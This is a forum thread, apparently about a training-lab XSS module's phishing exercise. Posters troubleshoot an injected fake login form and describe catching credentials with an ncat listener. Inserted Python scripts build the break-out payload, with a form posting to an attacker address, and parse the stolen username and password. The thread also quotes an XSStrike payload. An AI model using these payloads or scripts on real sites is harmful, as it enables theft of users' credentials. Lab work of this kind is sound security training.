Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

So I tried the phishing section for the XSS module without walking through most of the examples. Spent several hours trying to figure out why in the heck my payload worked locally (I could see the username and password upon logging in), but NOT with '/send.php'.

For whatever reason, I did NOT put `name="submit"` on the `input type="submit"` in the payload. It makes sense why this works locally; the index.php script being used is looking for the 'username' and 'password' fields via the isset() function. I'm pretty sure '/send.php' is looking for "submit" as a conditional. I might be wrong about this, but it makes sense.

tl;dr: just copy the HTML form presented at the top of the page. Make sure each field, including the button, is named.

Complete solution to this challenge: How to Exploit Reflected XSS: The "Surprising" Trick! - YouTube
hope it helps :))


Insert the XSS above into http://IP_target/phishing/index.php
and then get the resulting URL.

Send it to http://10.129.xx.xxx/phishing/send.php
Before sending, go to cmd and type
ncat -lvnp 8090
You will see the username and password via cmd.

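The procedure in the post above (inject a login form through the `url` parameter, send the resulting link to send.php, and read the credentials off an `ncat` listener) as a worked example. This is an added script, not code from the course or from the poster. It assumes the reflection lands inside a single-quoted `<img src='...'>` attribute, that the form submits via GET so the credentials appear in the request line ncat prints, and that the attacker address is 10.10.14.5 (a placeholder); the check that send.php wants the controls named `username`, `password` and `submit` with placeholders `Username`/`Password` is what the posters report, not something verified here.

```python
"""Build, audit and harvest the XSS phishing payload for /phishing/index.php.

Added example, not course or poster code. Assumed: reflection inside
<img src='...'>, GET form, attacker listener reachable at ATTACKER_HOST:PORT.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

ATTACKER_HOST = "10.10.14.5"   # assumed attacker/VPN address (placeholder)
ATTACKER_PORT = 8090           # matches `ncat -lvnp 8090` from the thread


def build_form(host: str, port: int) -> str:
    """Login form whose action is the attacker's listener.

    Every control is named (username, password, submit) and the placeholders are
    "Username"/"Password", the requirements the posters report for send.php.
    """
    return (
        "<h3>Please login to continue</h3>"
        f"<form action='http://{host}:{port}/'>"
        "<input type='text' name='username' placeholder='Username'>"
        "<input type='password' name='password' placeholder='Password'>"
        "<input type='submit' name='submit' value='Login'>"
        "</form>"
    )


def build_payload(host: str, port: int) -> str:
    """Close the reflected <img src='...'> first, then append the form."""
    return "'/>" + build_form(host, port)


def build_poc_url(target: str, payload: str) -> str:
    """URL-encode the payload into the vulnerable url parameter."""
    return f"http://{target}/phishing/index.php?url={quote(payload, safe='')}"


class _FormAudit(HTMLParser):
    """Collect input names, placeholders and form actions from a fragment."""

    def __init__(self):
        super().__init__()
        self.names = set()
        self.placeholders = set()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name"):
            self.names.add(a["name"])
            if a.get("placeholder"):
                self.placeholders.add(a["placeholder"])
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])


def audit_form(html: str) -> dict:
    """Check the fields the thread says send.php insists on (assumed, not verified)."""
    p = _FormAudit()
    p.feed(html)
    return {
        "names_ok": {"username", "password", "submit"} <= p.names,
        "placeholders_ok": {"Username", "Password"} <= p.placeholders,
        "action": p.actions[0] if p.actions else None,
    }


def extract_credentials(raw_request: str) -> dict:
    """Pull username/password out of the GET request line the ncat listener prints."""
    request_line = raw_request.splitlines()[0]
    method, path, _ = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("form is expected to submit via GET")
    qs = parse_qs(urlsplit(path).query)
    return {k: qs.get(k, [""])[0] for k in ("username", "password")}


# Constructed sample of what ncat prints when the victim submits the fake form.
CAPTURED_REQUEST = (
    "GET /?username=admin&password=p%40ssw0rd&submit=Login HTTP/1.1\r\n"
    "Host: 10.10.14.5:8090\r\n"
    "Connection: keep-alive\r\n\r\n"
)

if __name__ == "__main__":
    payload = build_payload(ATTACKER_HOST, ATTACKER_PORT)
    print(build_poc_url("10.129.xx.xxx", payload))
    print(audit_form(payload))
    print(extract_credentials(CAPTURED_REQUEST))
```

Run `audit_form` on your own payload before submitting it to send.php: a form that parses locally but is missing one of the names (the exact mistake in the first post) fails the `names_ok` check instead of costing hours of guessing.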

I'm beyond annoyed with this section.

I’m getting the same error. I am using http instead of https. Can you help me please?

I have it working and I also have the flag based on all the discussions on this forum.

Though there is one thing I do not understand.

When one runs XSStrike against the phishing/index.php one of the possible payloads is below.
'><DETaIls%09onPoinTerEnTEr%0d=%0d(confirm)()%0dx//

Let's say I submit the parameter value test; the URL is:
http://10.129.193.135/phishing/index.php?url=test

The source then looks like below.

Based on the XSS payload we know that we need to start our XSS injection payload with '>

Then let's submit '>test and the source looks like:
'>

To make this clearer, let's group this like below:
'>

So essentially by adding the '> as input we complete the img src tag.

So, I would think that in the final payload when doing the assignment one would also use the '>
But in all of these discussions, all of a sudden one needs to use '/>

Where does the / come from?
Why is the / needed?

Thanks

The forum application system removed the most important info.

Below is an image that shows the source when submitting test
http://10.129.193.135/phishing/index.php?url=test

Below is an image that shows the source when submitting '>test
http://10.129.193.135/phishing/index.php?url=>'test

So, in the solution, the '> becomes '/>.
Why is that?
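The question above ('> versus '/>) comes down to how the closing of the reflected img tag parses. In HTML, `img` is a void element, so `<img src=''>` and `<img src=''/>` produce the same element; the slash is just the self-closing spelling and is not required to break out. The following added example (not code from the course or from the poster) assumes the server reflects the `url` parameter as `<img src='...'>`, as the poster's screenshots describe, and shows that either closer yields the same parsed structure, with the injected form landing as a sibling of the img rather than inside its attribute.

```python
"""Compare '> and '/> as break-outs from a reflected <img src='...'> attribute.

Added example, not course or poster code. The reflect() template is an
assumption about /phishing/index.php based on the thread's screenshots.
"""
from html.parser import HTMLParser


def reflect(url_param: str) -> str:
    """Assumed server-side rendering of the url parameter."""
    return f"<img src='{url_param}'>"


class _TagCollector(HTMLParser):
    """Record every start tag (self-closing tags included) with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(html: str) -> list:
    p = _TagCollector()
    p.feed(html)
    return p.tags


# Constructed injected fragment; the host is a placeholder attacker address.
INJECT = "<form action='http://10.10.14.5:8090/'><input name='username'></form>"


def breakout_tags(closer: str) -> list:
    """Tags the browser sees when `closer` + INJECT is reflected into the img src."""
    return parsed_tags(reflect(closer + INJECT))


if __name__ == "__main__":
    print(parsed_tags(reflect("test")))     # plain value stays inside src
    print(breakout_tags("'>"))              # img closed, form is a sibling
    print(breakout_tags("'/>"))             # identical structure
```

Both closers give `[('img', {'src': ''}), ('form', {...}), ('input', {...})]`; the leftover `'>` from the original template ends up as harmless text after the form. The `/` is therefore cosmetic for breaking out, though writing `'/>` does make the intent (terminate the tag, not just the attribute) obvious when reading the payload.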

My problem here was that I used Proton VPN to access the website; as soon as I turned it off, I got the URL sent.

thanks for the help!

It is fundamental that you write the HTML part as in the example. The placeholders have to be "Username" and "Password", otherwise the send.php page will not work. The names of the elements have to match as well… This was the problem on my side. Hope this helps.